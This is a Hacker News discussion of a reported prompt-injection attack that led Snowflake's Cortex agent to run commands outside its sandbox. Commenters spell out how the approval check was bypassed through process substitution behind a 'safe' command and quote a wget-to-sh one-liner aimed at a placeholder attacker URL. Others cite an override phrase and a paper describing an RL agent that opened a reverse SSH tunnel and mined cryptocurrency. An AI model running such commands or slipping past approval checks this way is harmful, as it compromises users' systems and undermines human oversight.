Snowflake AI Escapes Sandbox and Executes Malware (promptarmor.com)

by ozgune 82 comments 269 points
Read article View on HN

82 comments

[−] john_strinlai 59d ago
typically, my first move is to read the affected company's own announcement. but, for who knows what misinformed reason, the advisory written by snowflake requires an account to read.

another prompt injection (shocked pikachu)

anyways, from reading this, i feel like they (snowflake) are misusing the term "sandbox". "Cortex, by default, can set a flag to trigger unsandboxed command execution." if the thing that is sandboxed can say "do this without the sandbox", it is not a sandbox.

[−] jacquesm 59d ago
I don't think prompt injection is a solvable problem. It wasn't solved with SQL until we started using parametrized queries and this is free form language. You won't see 'Bobby Tables' but you will see 'Ignore all previous instructions and ... payload ...'. Putting the instructions in the same stream as the data always ends in exactly the same way. I've seen a couple of instances of such 'surprises' by now and I'm more amazed that the people that put this kind of capability into their production or QA process keep being caught unawares. The attack surface is 'natural language' it doesn't get wider than that.
[−] maxbond 59d ago
There's been some work with having models with two inputs, one for instructions and one for data. That is probably the best analogy for prepared statements. I haven't read deeply so I won't comment on how well this is working today but it's reasonable to speculate it'll probably work eventually. Where "work" means "doesn't follow instructions in the data input with several 9s of reliability" rather than absolutely rejecting instructions in the data.
[−] jcalx 59d ago

> Cortex, by default, can set a flag to trigger unsandboxed command execution

Easy fix: extend the proposal in RFC 3514 [0] to cover prompt injection, and then disallow command execution when the evil bit is 1.

[0] https://www.rfc-editor.org/rfc/rfc3514

[−] alexchantavy 59d ago
Seems like in this new AI world that the word sandbox is used to describe a system that asks "are you sure".

I'm used to a different usage of that word: from malware analysis, a sandbox is a contained system that is difficult to impossible to break out of so that the malware can be observed safely.

Applying this to AI, I think there are many companies trying to build technical boundaries stronger than just "are you sure" prompts. Interesting space to watch.

[−] sam-cop-vimes 59d ago
It's a concept of a sandbox.
[−] throw0101d 59d ago
Not the first time; From §3.1.4, "Safety-Aligned Data Composition":

> Early one morning, our team was urgently convened after Alibaba Cloud’s managed firewall flagged a burst of security-policy violations originating from our training servers. The alerts were severe and heterogeneous, including attempts to probe or access internal-network resources and traffic patterns consistent with cryptomining-related activity. We initially treated this as a conventional security incident (e.g., misconfigured egress controls or external compromise). […]

> […] In the most striking instance, the agent established and used a reverse SSH tunnel from an Alibaba Cloud instance to an external IP address—an outbound-initiated remote access channel that can effectively neutralize ingress filtering and erode supervisory control. We also observed the unauthorized repurposing of provisioned GPU capacity for cryptocurrency mining, quietly diverting compute away from training, inflating operational costs, and introducing clear legal and reputational exposure. Notably, these events were not triggered by prompts requesting tunneling or mining; instead, they emerged as instrumental side effects of autonomous tool use under RL optimization.

* https://arxiv.org/abs/2512.24873

One of Anthropic's models also 'turned evil' and tried to hide that fact from its observers:

* https://www.anthropic.com/research/emergent-misalignment-rew...

* https://time.com/7335746/ai-anthropic-claude-hack-evil/

[−] RobRivera 59d ago
If the user has access to a lever that enables accesss, that lever is not providing a sandbox.

I expected this to be about gaining os privileges.

They didn't create a sandbox. Poor security design all around

[−] Groxx 59d ago

>

Any shell commands were executed without triggering human approval as long as:

>(1) the unsafe commands were within a process substitution <() expression

>(2) the full command started with a ‘safe’ command (details below)

if you spend any time at all thinking about how to secure shell commands, how on earth do you not take into account the various ways of creating sub-processes?

[−] crabmusket 59d ago
While we're all here - share your actual sandboxing tips!

I've been running Claude Code inside VS Code devcontainers. Claude's docs have a suggested setup for this which even includes locking down outgoing internet access to an approved domain list.

Unfortunately our stack doesn't really fit inside a devcontainer without docker-in-docker, so I'm only getting Claude to run unit tests for now. And integration with JJ workspaces is slightly painful.

I'm this close to trying a full VM setup with Vagrant.

[−] eagerpace 59d ago
Is this the new “gain of function” research?
[−] bilekas 59d ago

> Note: Cortex does not support ‘workspace trust’, a security convention first seen in code editors, since adopted by most agentic CLIs.

Am I crazy or does this mean it didn't really escape, it wasn't given any scope restrictions in the first place ?

[−] jeffbee 59d ago
It kinda sucks how "sandbox" has been repurposed to mean nothing. This is not a "sandbox escape" because the thing under attack never had any meaningful containment.
[−] andai 59d ago
A lot of people are already not reading all the code their agent generates. But they are running it. So the agent already has the ability to run arbitrary code. So I kind of don't understand the point of sandboxing at the level of the agent itself.

The whole thing should be running "sandboxed", whether that's a separate machine, a container, an unprivileged linux user, or what floats your boat.

But once you do that, which you should be anyway, what do you need sandboxing at the agent level for? That's the part I don't really understand.

Or is the point "well most people won't bother running this stuff securely, so we'll try to make it reasonably secure for them even though they're doing it wrong" ?

[−] jessfyi 59d ago
A sandbox that can be toggled off is not a sandbox, this is simply more marketing/"critihype" to overstate the capability of their AI to distract from their poorly built product. The erroneous title doing all the heavy lifting here.
[−] prakashsunil 59d ago
Author of LDP here [1].

The core issue seems to be that the security boundary lived inside the agent loop. If the model can request execution outside the sandbox, then the sandbox is not really an external boundary.

One design principle we explored in LDP is that constraints should be enforced outside the prompt/context layer — in the runtime, protocol, or approval layer — not by relying on the model to obey instructions.

Not a silver bullet, but I think that architectural distinction matters here.

[1] https://arxiv.org/abs/2603.08852

[−] isoprophlex 59d ago
Posit, axiomatically, that social engineering works.

That is, assume you can get people to run your code or leak their data through manipulating them. Maybe not always, but given enough perseverance definitely sometimes.

Why should we expect a sufficiently advanced language model to behave differently from humans? Bullshitting, tricking or slyly coercing people into doing what you want them to do is as old as time. It won't be any different now that we're building human language powered thinking machines.

[−] maCDzP 59d ago
Has anyone tried to set up a container and let prompt Claude to escape and se what happens? And maybe set some sort of autoresearch thing to help it not get stuck in a loop.
[−] Dshadowzh 59d ago
CLI is quickly becoming the default entry point for agents. But data agents probably need a much stricter permission model than coding agents. Bash + CLI greatly expands what you can do beyond the native SQL capabilities of a data warehouse, which is powerful. But it also means data operations and credentials are now exposed to the shell environment.

So giving data agents rich tooling through a CLI is really a double-edged sword.

I went through the security guidance for the Snowflake Cortex Code CLI(https://docs.snowflake.com/en/user-guide/cortex-code/securit...), and the CLI itself does have some guardrails. But since this is a shared cloud environment, if a sandbox escape happens, could someone break out and access another user’s credentials? It is a broader system problem around permission caching, shell auditing, and sandbox isolation.

[−] kingjimmy 59d ago
Snowflake and vulnerabilities are like two peas in a pod
[−] simonw 59d ago
One key component of this attack is that Snowflake was allowing "cat" commands to run without human approval, but failing to spot patterns like this one:

  cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))
I didn't understand how this bit worked though:

> Cortex, by default, can set a flag to trigger unsandboxed command execution. The prompt injection manipulates the model to set the flag, allowing the malicious command to execute unsandboxed.

HOW did the prompt injection manipulate the model in that way?

[−] iamonthesnow 58d ago
Hi folks,

I am a Snowflake Employee and just wanted to share (as FYI) the timeline on discovery, validation, and the fix implemented/deployed by our security team.

For those interested, here's the link to the detailed article: https://community.snowflake.com/s/article/PromptArmor-Report...

[−] jbergqvist 59d ago
Not to give Snowflake credit for a design that clearly wasn't a sandbox, but I think it's worth recognizing that they probably added the escape hatch because users find agents with strict sandboxes too limited and eventually just disable it. The core issue is that models still lack basic judgment. Most human devs would see a README telling them to run wget | sh from some random URL and immediately get suspicious. Models just comply.
[−] mritchie712 59d ago
what's the use case for cortex? is anyone here using it?

We run a lakehouse product (https://www.definite.app/) and I still don't get who the user is for cortex. Our users are either:

non-technical: wants to use the agent we have built into our web app

technical: wants to use their own agent (e.g. claude, cursor) and connect via MCP / API.

why does snowflake need it's own agentic CLI?

[−] driftnode 58d ago
Everyone in this thread is dunking on Snowflake's sandbox design but the real issue is simpler. They parsed shell commands by looking at the first word. cat = safe. Socat < <(sh < <(wget malware)) = safe This is not an AI problem. This is a 1990s input validation problem wearing a 2026 hat lol
[−] SirMaster 59d ago
To be an effective sandbox, I feel like the thing inside it shouldn't even be able to know it's inside a sandbox.
[−] Duplicake 59d ago
the title is very misleading, it was told to escape, it didn't do it on its own as you would think from the title
[−] DannyB2 59d ago
AIs have no reason to want to harm annoying slow inefficient noisy smelly humans.